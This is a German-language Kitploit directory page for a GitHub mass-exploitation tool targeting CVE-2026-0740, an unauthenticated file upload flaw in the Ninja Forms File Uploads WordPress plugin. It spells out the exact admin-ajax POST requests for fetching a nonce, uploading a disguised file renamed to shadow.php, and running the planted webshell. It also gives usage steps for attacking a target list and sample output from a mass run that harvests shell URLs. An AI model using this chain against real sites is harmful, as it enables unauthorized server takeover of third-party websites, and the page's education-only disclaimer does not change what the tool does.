Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-0740 — Automatisierter Massen-Exploiter für CVE-2026-0740, einen nicht authentifizierten beliebigen Datei-Upload im Ninja Forms File Uploads Plugin, der Remote-Code-Ausführung über manipulierte Uploads ermöglicht. | Kitploit
Tools/GitHubGitHub/xshadow-here/cve-2026-0740
SchwachstellenscannerPayload-GenerierungExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubxshadow-here/cve-2026-0740

CVE-2026-0740

Automatisierter Massen-Exploiter für CVE-2026-0740, einen nicht authentifizierten beliebigen Datei-Upload im Ninja Forms File Uploads Plugin, der Remote-Code-Ausführung über manipulierte Uploads ermöglicht.

Repository anzeigen
3vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-0740 : Ninja Forms - File Upload <= 3.3.26 Nicht authentifizierter beliebiger Datei-Upload.

Beschreibung :

Das Ninja Forms - File Uploads Plugin für WordPress ist anfällig für nicht authentifizierte beliebige Datei-Uploads aufgrund fehlender Dateityp-Validierung und fehlender Berechtigungsprüfungen in der Funktion 'NF_FU_AJAX_Controllers_Uploads::handle_upload' in allen Versionen bis einschließlich 3.3.26.

Diese Schwachstelle ermöglicht es nicht authentifizierten Angreifern:

  • Gültige Nonces für JEDE field_id zu generieren.
  • Beliebige Dateien mithilfe der Whitelist-Umgehungstechnik hochzuladen.
  • Eine serverseitige Umbenennung von einer Whitelist-Erweiterung (.pdf) zu einer PHP-Erweiterung zu erzwingen.
  • Die hochgeladene Webshell wird gespeichert unter: → /wp-content/uploads/ninja-forms/tmp/
  • Remote Code Execution (RCE) auf dem betroffenen Server zu erreichen.

INFO : CVE-2026-0740

~ CVSS-Score: 9.8 (Kritisch)

~ Betroffene Versionen: <= 3.3.26

  • Forscher : Sélim Lanouar-(whattheslime)

Angriffsvektor

root@kitploit:~
Schritt 1: Nonce abrufen 
────────────────────────────────────
POST /wp-admin/admin-ajax.php
Daten: action=nf_fu_get_new_nonce&field_id=7&form_id=7

Antwort: {"success":true,"data":{"nonce":"7a850757a1"}}

              │
              ▼

Schritt 2: Getarnte Datei hochladen + in PHP umbenennen
──────────────────────────────────────────────
POST /wp-admin/admin-ajax.php
Daten:
- action=nf_fu_upload
- nonce=7a850757a1
- field_id=7
- form_id=7
- [email protected] (Whitelist-Erweiterung)
- doc_pdf=shadow.php (Umbenennungsziel)

              │
              ▼

Schritt 3: Server speichert bösartige Datei
─────────────────────────────────────
Speicherort: /wp-content/uploads/ninja-forms/tmp/shadow.php
Inhalt: PHP-Shell (Uploader / Webshell)

              │
              ▼

Schritt 4: Hochgeladene Datei ausführen
────────────────────────────────────
GET /wp-content/uploads/ninja-forms/tmp/shadow.php
→ Webshell ausführen
→ Vollständige Serverübernahme
root@kitploit:~
- Schlussfolgerungen aus Feldexperimenten:

1. Der Endpunkt `nf_fu_get_new_nonce` gibt eine gültige Nonce zurück, ohne die Existenz des Feldes zu prüfen
   → Keine Validierung der Parameter `field_id` und `form_id` (JEDE zufällige ID funktioniert)

2. Kritischer logischer Fehler in der Umbenennungsfunktion
   → Das Plugin akzeptiert einen vom Benutzer bereitgestellten Dateinamen über den POST-Parameter
   → Keine Validierung der endgültigen Dateierweiterung nach der Umbenennung

3. Die hochgeladene Datei landet direkt in einem webbasiert zugänglichen Verzeichnis
   → /wp-content/uploads/ninja-forms/tmp/

4. Der Besitzer dieses Tools ist sehr gutaussehend

Funktionen :

  • Automatisches Abrufen der Nonce
  • Exploit mit Standard-ID
  • Fehlerbehandlung
  • Automatisches Speichern der Ergebnisse in shell.txt

Verwendung :

  • Stellen Sie sicher, dass die Datei list.txt heißt und sich im Verzeichnis befindet
  • python/python3 shadow.py

Ausgabe :

root@kitploit:~
˚⊱🪷⊰˚ NINJA FORMS MASS EXPLOITER ˚⊱🪷⊰˚
 ╰┈➤ Vollständige Antwortanzeige

[+] 100 Ziele geladen

[1/100]
😈 [FRISKA RESEARCHER] Angriff auf: https://example.com
[*] Nonce wird abgerufen...
[*] HTTP-Status: 400
[*] Antwort: 0
[-] HTTP-Fehler: 400

[2/100]
😈 [FRISKA RESEARCHER] Angriff auf: https://www.test.com
[*] Nonce wird abgerufen...
[*] HTTP-Status: 200
[*] Antwort: {"success":true,"data":{"nonce":"b0404ec210","nonce_expiry":1775648146}}
[+] Nonce: b0404ec210
[*] Shell wird hochgeladen...
[*] Upload-Antwort: {"data":{"files":[{"name":"doc.pdf","full_path":"doc.pdf","type":"application\/pdf","tmp_name":"shadow.php","error":0,"size":246,"new_tmp_key":"doc_pdf"}]},"errors":[],"debug":[]}

============================================================
🔥 SHELL-UPLOADER: https://www.test.com/wp-content/uploads/ninja-forms/tmp/shadow.php
============================================================

Dieses Tool dient ausschließlich Bildungs- und Sicherheitstestzwecken.

Die unbefugte Nutzung von Systemen, die Ihnen nicht gehören oder für die Sie keine Testberechtigung haben, ist illegal.

Tool herunterladen